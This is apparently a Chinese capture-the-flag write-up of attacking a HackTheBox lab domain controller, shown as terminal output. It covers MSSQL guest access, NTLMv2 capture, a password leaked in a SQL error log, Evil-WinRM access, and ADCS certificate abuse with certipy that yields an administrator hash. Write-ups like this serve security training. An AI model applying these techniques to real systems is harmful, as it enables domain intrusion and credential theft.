┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p- --min-rate=1000010.10.11.202 [sudo] kali 的密码: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 05:35 CST Nmap scan report for sequel.htb (10.10.11.202) Host is up (0.24s latency). Not shown: 65529 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3269/tcp open globalcatLDAPssl 9389/tcp open adws
Nmap done: 1 IP address (1 host up) scanned in 22.97 seconds
┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p53,135,139,445,3269,9389 -sV -sC 10.10.11.202 --min-rate=10000 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 05:36 CST Nmap scan report for sequel.htb (10.10.11.202) Host is up (0.36s latency).
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-04-21T21:38:59+00:00; +52s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2022-11-18T21:05:34 |_Not valid after: 2023-11-18T21:05:34 9389/tcp open mc-nmf .NET Message Framing Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 90.99 seconds
3、先绑定下hosts信息吧
1 2 3 4 5 6 7 8
┌──(kali㉿offsec)-[~/Desktop] └─$ echo "10.10.11.202 sequel.htb" | sudo tee -a /etc/hosts [sudo] kali 的密码: 10.10.11.202 sequel.htb
┌──(kali㉿offsec)-[~/Desktop] └─$ echo "10.10.11.202 dc.sequel.htb" | sudo tee -a /etc/hosts 10.10.11.202 dc.sequel.htb
[+] IP: 10.10.11.202:445 Name: sequel.htb Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC NETLOGON NO ACCESS Logon server share Public READ ONLY SYSVOL NO ACCESS Logon server share
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Public Disk SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿offsec)-[~/Desktop] └─$ smbclient \\\\10.10.11.202\\Public -N Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Nov 1919:51:252022 .. D 0 Sat Nov 1919:51:252022 SQL Server Procedures.pdf A 49551 Fri Nov 1821:39:432022
5184255 blocks of size 4096.1475945 blocks available smb: \> get "SQL Server Procedures.pdf" getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (34.7 KiloBytes/sec) (average 34.7 KiloBytes/sec) smb: \> exit
┌──(kali㉿offsec)-[~/Desktop] └─$ smbclient \\\\10.10.11.202\\SYSVOL -N Try "help" to get a list of possible commands. smb: \> ls NT_STATUS_ACCESS_DENIED listing \* smb: \> exit
[*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'. [*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server(1507208) [!] Press help for extra shell commands SQL(PublicUser guest@master)> SELECT @@version;
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) Sep 24201913:48:23 Copyright (C) 2019 Microsoft Corporation Express Edition(64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: )(Hypervisor)
SQL(PublicUser guest@master)> SELECT name FROM sys.databases; name ------ master
tempdb
model
msdb
SQL(PublicUser guest@master)>
到这里可以看出来都是一些默认的库;
SQL(PublicUser guest@master)> select db_name();
------ master
SQL(PublicUser guest@master)> select * from master; [-] ERROR(DC\SQLMOCK): Line 1: Invalid object name 'master'. SQL (PublicUser guest@master)> SELECT * FROM master.information_schema.tables; TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE ------------- ------------ ---------------- ---------- master dbo spt_fallback_db b'BASE TABLE'
SQL (PublicUser guest@master)> EXECUTE xp_cmdshell 'whoami'; [-] ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'. SQL (PublicUser guest@master)> EXECUTE sp_configure 'show advanced options', 1; [-] ERROR(DC\SQLMOCK): Line 105: User does not have permission to perform this action. SQL (PublicUser guest@master)>
9、到这里会发现,基本上也是啥都利用不了,但是这里因为是域环境下,还涉及到一个 NTLMv2的攻击手法:数据库中没有有用的数据,不能运行命令。接下来要尝试的是让SQL服务器连接回我的主机并进行身份验证,并捕获可以尝试暴力破解的challenge/response。在Querier和Getting Creds via NTLMv2中都展示了这一点。在这里启动Responder作为root监听tun0接口的一堆服务,唯一关心的是SMB。现在告诉MSSQL读取主机上共享的文件:
[+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [OFF] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] MQTT server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] SNMP server [OFF]
ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits.
* Append -O to the commandline. This lowers the maximum supported password/salt length(usually down to 32).
* Append -w 3 to the commandline. This can cause your screen to lag.
* Append -S to the commandline. This has a drastic speed impact but can be better for specific attacks. Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way: https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power: https://hashcat.net/faq/morework
┌──(kali㉿offsec)-[~/Desktop] └─$ file ERRORLOG.BAK ERRORLOG.BAK: Unicode text, UTF-16, little-endian text, with very longlines(508), with CRLF line terminators
┌──(kali㉿offsec)-[~/Desktop] └─$ cat ERRORLOG.BAK ��2022-11-18 13:43:05.96 Server Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) Sep 24 2019 13:48:23 Copyright(C) 2019 Microsoft Corporation Express Edition(64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: )(Hypervisor)
2022-11-18 13:43:05.97 Server UTC adjustment: -8:00 2022-11-18 13:43:05.97 Server(c) Microsoft Corporation. 2022-11-18 13:43:05.97 Server All rights reserved. 2022-11-18 13:43:05.97 Server Server process ID is 3788. 2022-11-18 13:43:05.97 Server System Manufacturer: 'VMware, Inc.', System Model: 'VMware7,1'. 2022-11-18 13:43:05.97 Server Authentication mode is MIXED. 2022-11-18 13:43:05.97 Server Logging SQL Server messages in file 'C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\Log\ERRORLOG'. 2022-11-18 13:43:05.97 Server The service account is 'NT Service\MSSQL$SQLMOCK'. This is an informational message; no user action is required. 2022-11-1813:43:05.97 Server Registry startup parameters: -d C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\master.mdf -e C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\Log\ERRORLOG -l C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\mastlog.ldf 2022-11-1813:43:05.97 Server Command Line Startup Parameters: -s "SQLMOCK" -m "SqlSetup" -Q -q "SQL_Latin1_General_CP1_CI_AS" -T 4022 -T 4010 -T 3659 -T 3610 -T 8015 2022-11-1813:43:05.97 Server SQL Server detected 1 sockets with 1 cores per socket and 1 logical processors per socket, 1 total logical processors; using 1 logical processors based on SQL Server licensing. This is an informational message; no user action is required. 2022-11-1813:43:05.97 Server SQL Server is starting at normal priority base(=7). This is an informational message only. No user action is required. 2022-11-18 13:43:05.97 Server Detected 2046 MB of RAM. This is an informational message; no user action is required. 2022-11-1813:43:05.97 Server Using conventional memory in the memory manager. 2022-11-1813:43:05.97 Server Page exclusion bitmap is enabled. 2022-11-1813:43:05.98 Server Buffer Pool: Allocating 262144 bytes for166158 hashPages. 2022-11-1813:43:06.01 Server Default collation: SQL_Latin1_General_CP1_CI_AS (us_english 1033) 2022-11-1813:43:06.04 Server Buffer pool extension is already disabled. No action is necessary. 2022-11-1813:43:06.06 Server Perfmon counters for resource governor pools and groups failed to initialize and are disabled. 2022-11-1813:43:06.07 Server Query Store settings initialized with enabled = 1, 2022-11-1813:43:06.07 Server This instance of SQL Server last reported using a process ID of 5116 at 11/18/20221:43:04 PM (local) 11/18/20229:43:04 PM (UTC). This is an informational message only; no user action is required. 2022-11-1813:43:06.07 Server Node configuration: node 0: CPU mask: 0x0000000000000001:0 Active CPU mask: 0x0000000000000001:0. This message provides a description of the NUMA configuration for this computer. This is an informational message only. No user action is required. 2022-11-1813:43:06.07 Server Using dynamic lock allocation. Initial allocation of 2500 Lock blocks and 5000 Lock Owner blocks per node. This is an informational message only. No user action is required. 2022-11-1813:43:06.08 Server In-Memory OLTP initialized on lowend machine. 2022-11-1813:43:06.08 Server The maximum number of dedicated administrator connections for this instance is '1' 2022-11-1813:43:06.09 Server [INFO] Created Extended Events session 'hkenginexesession'
2022-11-1813:43:06.09 Server Database Instant File Initialization: disabled. For security and performance considerations see the topic 'Database Instant File Initialization' in SQL Server Books Online. This is an informational message only. No user action is required. 2022-11-1813:43:06.10 Server CLR version v4.0.30319 loaded. 2022-11-1813:43:06.10 Server Total Log Writer threads: 1. This is an informational message; no user action is required. 2022-11-1813:43:06.13 Server Database Mirroring Transport is disabled in the endpoint configuration. 2022-11-1813:43:06.13 Server clflushopt is selected for pmem flush operation. 2022-11-1813:43:06.14 Server Software Usage Metrics is disabled. 2022-11-1813:43:06.14 spid9s Warning ****************** 2022-11-1813:43:06.36 spid9s SQL Server started in single-user mode. This an informational message only. No user action is required. 2022-11-1813:43:06.36 Server Common language runtime(CLR) functionality initialized using CLR version v4.0.30319 from C:\Windows\Microsoft.NET\Framework64\v4.0.30319\. 2022-11-18 13:43:06.37 spid9s Starting up database 'master'. 2022-11-18 13:43:06.38 spid9s The tail of the logfor database master is being rewritten to match the new sector size of 4096 bytes. 2048 bytes at offset 419840 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\mastlog.ldf will be written. 2022-11-18 13:43:06.39 spid9s Converting database 'master' from version 897 to the current version 904. 2022-11-18 13:43:06.39 spid9s Database 'master' running the upgrade step from version 897 to version 898. 2022-11-18 13:43:06.40 spid9s Database 'master' running the upgrade step from version 898 to version 899. 2022-11-18 13:43:06.41 spid9s Database 'master' running the upgrade step from version 899 to version 900. 2022-11-18 13:43:06.41 spid9s Database 'master' running the upgrade step from version 900 to version 901. 2022-11-18 13:43:06.41 spid9s Database 'master' running the upgrade step from version 901 to version 902. 2022-11-18 13:43:06.52 spid9s Database 'master' running the upgrade step from version 902 to version 903. 2022-11-18 13:43:06.52 spid9s Database 'master' running the upgrade step from version 903 to version 904. 2022-11-18 13:43:06.72 spid9s SQL Server Audit is starting the audits. This is an informational message. No user action is required. 2022-11-18 13:43:06.72 spid9s SQL Server Audit has started the audits. This is an informational message. No user action is required. 2022-11-18 13:43:06.74 spid9s SQL Trace ID 1 was started by login "sa". 2022-11-18 13:43:06.74 spid9s Server name is 'DC\SQLMOCK'. This is an informational message only. No user action is required. 2022-11-18 13:43:06.75 spid14s Starting up database 'mssqlsystemresource'. 2022-11-18 13:43:06.75 spid9s Starting up database 'msdb'. 2022-11-18 13:43:06.75 spid18s Password policy update was successful. 2022-11-18 13:43:06.76 spid14s The resource database build version is 15.00.2000. This is an informational message only. No user action is required. 2022-11-18 13:43:06.78 spid9s The tail of the logfor database msdb is being rewritten to match the new sector size of 4096 bytes. 3072 bytes at offset 50176 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\MSDBLog.ldf will be written. 2022-11-18 13:43:06.78 spid9s Converting database 'msdb' from version 897 to the current version 904. 2022-11-18 13:43:06.78 spid9s Database 'msdb' running the upgrade step from version 897 to version 898. 2022-11-18 13:43:06.79 spid14s Starting up database 'model'. 2022-11-18 13:43:06.79 spid9s Database 'msdb' running the upgrade step from version 898 to version 899. 2022-11-18 13:43:06.80 spid14s The tail of the logfor database model is being rewritten to match the new sector size of 4096 bytes. 512 bytes at offset 73216 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\modellog.ldf will be written. 2022-11-18 13:43:06.80 spid9s Database 'msdb' running the upgrade step from version 899 to version 900. 2022-11-18 13:43:06.81 spid14s Converting database 'model' from version 897 to the current version 904. 2022-11-18 13:43:06.81 spid14s Database 'model' running the upgrade step from version 897 to version 898. 2022-11-18 13:43:06.81 spid9s Database 'msdb' running the upgrade step from version 900 to version 901. 2022-11-18 13:43:06.81 spid14s Database 'model' running the upgrade step from version 898 to version 899. 2022-11-18 13:43:06.81 spid9s Database 'msdb' running the upgrade step from version 901 to version 902. 2022-11-18 13:43:06.82 spid14s Database 'model' running the upgrade step from version 899 to version 900. 2022-11-18 13:43:06.88 spid18s A self-generated certificate was successfully loaded for encryption. 2022-11-18 13:43:06.88 spid18s Server local connection provider is ready to accept connection on [ \\.\pipe\SQLLocal\SQLMOCK ]. 2022-11-18 13:43:06.88 spid18s Dedicated administrator connection support was not started because it is disabled on this edition of SQL Server. If you want to use a dedicated administrator connection, restart SQL Server using the trace flag 7806. This is an informational message only. No user action is required. 2022-11-18 13:43:06.88 spid18s SQL Server is now ready for client connections. This is an informational message; no user action is required. 2022-11-1813:43:06.88 Server SQL Server is attempting to register a Service Principal Name(SPN)for the SQL Server service. Kerberos authentication will not be possible until a SPN is registered for the SQL Server service. This is an informational message. No user action is required. 2022-11-18 13:43:06.88 spid14s Database 'model' running the upgrade step from version 900 to version 901. 2022-11-18 13:43:06.89 Server The SQL Server Network Interface library could not register the Service Principal Name(SPN) [ MSSQLSvc/dc.sequel.htb:SQLMOCK ] for the SQL Server service. Windows return code: 0x2098, state: 15. Failure to register a SPN might cause integrated authentication to use NTLM instead of Kerberos. This is an informational message. Further action is only required if Kerberos authentication is required by authentication policies and if the SPN has not been manually registered. 2022-11-18 13:43:06.89 spid14s Database 'model' running the upgrade step from version 901 to version 902. 2022-11-18 13:43:06.89 spid14s Database 'model' running the upgrade step from version 902 to version 903. 2022-11-18 13:43:06.89 spid14s Database 'model' running the upgrade step from version 903 to version 904. 2022-11-18 13:43:07.00 spid14s Clearing tempdb database. 2022-11-18 13:43:07.06 spid14s Starting up database 'tempdb'. 2022-11-18 13:43:07.17 spid9s Database 'msdb' running the upgrade step from version 902 to version 903. 2022-11-18 13:43:07.17 spid9s Database 'msdb' running the upgrade step from version 903 to version 904. 2022-11-18 13:43:07.29 spid9s Recovery is complete. This is an informational message only. No user action is required. 2022-11-18 13:43:07.30 spid51 Changed database context to 'master'. 2022-11-18 13:43:07.30 spid51 Changed language setting to us_english. 2022-11-18 13:43:07.33 spid51 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. 2022-11-18 13:43:07.34 spid51 Configuration option 'default language' changed from 0 to 0. Run the RECONFIGURE statement to install. 2022-11-18 13:43:07.34 spid51 Configuration option 'default full-text language' changed from 1033 to 1033. Run the RECONFIGURE statement to install. 2022-11-18 13:43:07.34 spid51 Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install. 2022-11-18 13:43:07.39 spid51 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. 2022-11-18 13:43:07.39 spid51 Configuration option 'user instances enabled' changed from 1 to 1. Run the RECONFIGURE statement to install. 2022-11-18 13:43:07.39 spid51 Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install. 2022-11-18 13:43:07.44 spid51 Changed database context to 'master'. 2022-11-18 13:43:07.44 spid51 Changed language setting to us_english. 2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8. 2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] 2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8. 2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] 2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required. 2022-11-18 13:43:07.76 spid51 Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required. 2022-11-1813:43:08.24 spid51 Changed database context to 'master'. 2022-11-1813:43:08.24 spid51 Changed language setting to us_english. 2022-11-1813:43:09.29 spid9s SQL Server is terminating in response to a 'stop' request from Service Control Manager. This is an informational message only. No user action is required. 2022-11-1813:43:09.31 spid9s .NET Framework runtime has been stopped. 2022-11-1813:43:09.43 spid9s SQL Trace was stopped due to server shutdown. Trace ID = '1'. This is an informational message only; no user action is required.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> net time /domain Current time at \\dc.sequel.htb is 4/22/20242:45:21 PM
The command completed successfully.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> net user Ryan.Cooper User name Ryan.Cooper Full Name Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never
Password last set2/1/20232:52:57 PM Password expires Never Password changeable 2/2/20232:52:57 PM Password required Yes User may change password No
Workstations allowed All Logon script User profile Home directory Last logon 2/7/202310:13:56 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use Global Group memberships *Domain Users The command completed successfully.
[*] Action: Find certificate templates [*] Using current user's unrolled group SIDs for vulnerability checks. [*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA DNS Hostname : dc.sequel.htb FullName : dc.sequel.htb\sequel-DC-CA Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56 Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101 Cert Start Date : 11/18/202212:58:46 PM Cert End Date : 11/18/21211:08:46 PM Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb UserSpecifiedSAN : Disabled CA Permissions : Owner: BUILTIN\Administrators S-1-5-32-544
[*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 11 [*] Got certificate with UPN 'administrator@sequel.htb' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx'
┌──(kali㉿offsec)-[~/Desktop] └─$ certipy-ad auth -pfx administrator.pfx Certipy v4.7.0 - by Oliver Lyak(ly4k)
[*] Using principal: administrator@sequel.htb [*] Trying to get TGT... [-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
[*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 14 [*] Got certificate with UPN 'administrator@sequel.htb' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx'
┌──(kali㉿offsec)-[~/Desktop] └─$ certipy-ad auth -pfx administrator.pfx Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for'administrator' [*] Got hash for'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee